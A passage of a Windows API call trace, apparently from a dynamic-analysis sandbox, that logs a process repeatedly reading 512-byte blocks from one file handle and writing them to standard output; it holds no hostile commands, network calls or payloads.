0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.860] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) 
returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.861] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.861] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.863] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.863] GetFileType (hFile=0x50) returned 0x1 [0149.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.863] GetFileType (hFile=0x50) returned 0x1 [0149.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.863] GetFileType (hFile=0x50) returned 0x1 [0149.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.924] GetFileType (hFile=0x50) returned 0x1 [0149.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.924] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.934] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.934] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, 
lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, 
lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.935] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.935] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.936] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.936] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0149.936] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile 
